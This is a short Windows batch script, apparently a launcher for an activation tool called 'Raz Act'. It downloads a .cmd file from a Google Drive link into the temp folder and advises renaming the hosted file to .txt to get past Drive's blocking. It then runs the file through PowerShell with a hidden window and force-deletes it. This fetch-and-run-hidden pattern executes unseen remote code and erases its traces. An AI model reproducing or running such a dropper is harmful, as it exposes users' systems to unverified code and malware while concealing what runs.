ÿþ&cls @echo off title raz act Cloud v1.0 color 1f set "fileid=1mdd8EJaqOviZZhbk2YXu9dwsHOS-aKAQ" set "targetFile=%temp%\raz_act.cmd" cls echo ============================================================================= echo DOWNLOADING Raz Act v12.2 echo ============================================================================= echo. :: 3 curl -L "https://drive.google.com/uc?export=download&id=%fileid%" -o "%targetFile%" :: 4 if not exist "%targetFile%" ( cls color 4f echo [ERROR] Download Failed! Please check internet. pause exit ) :: 5 findstr /i "" "%targetFile%" >nul if %errorlevel%==0 ( cls color 4f echo [ERROR] Google Drive Blocked the file! echo SOLUTION: Rename the file in Google Drive to "raz_act.txt" del "%targetFile%" pause exit ) echo Launching Application... start "" powershell -WindowStyle Hidden -Command "Start-Process -FilePath '%targetFile%' -Wait; Remove-Item -Path '%targetFile%' -Force" :: 7 exit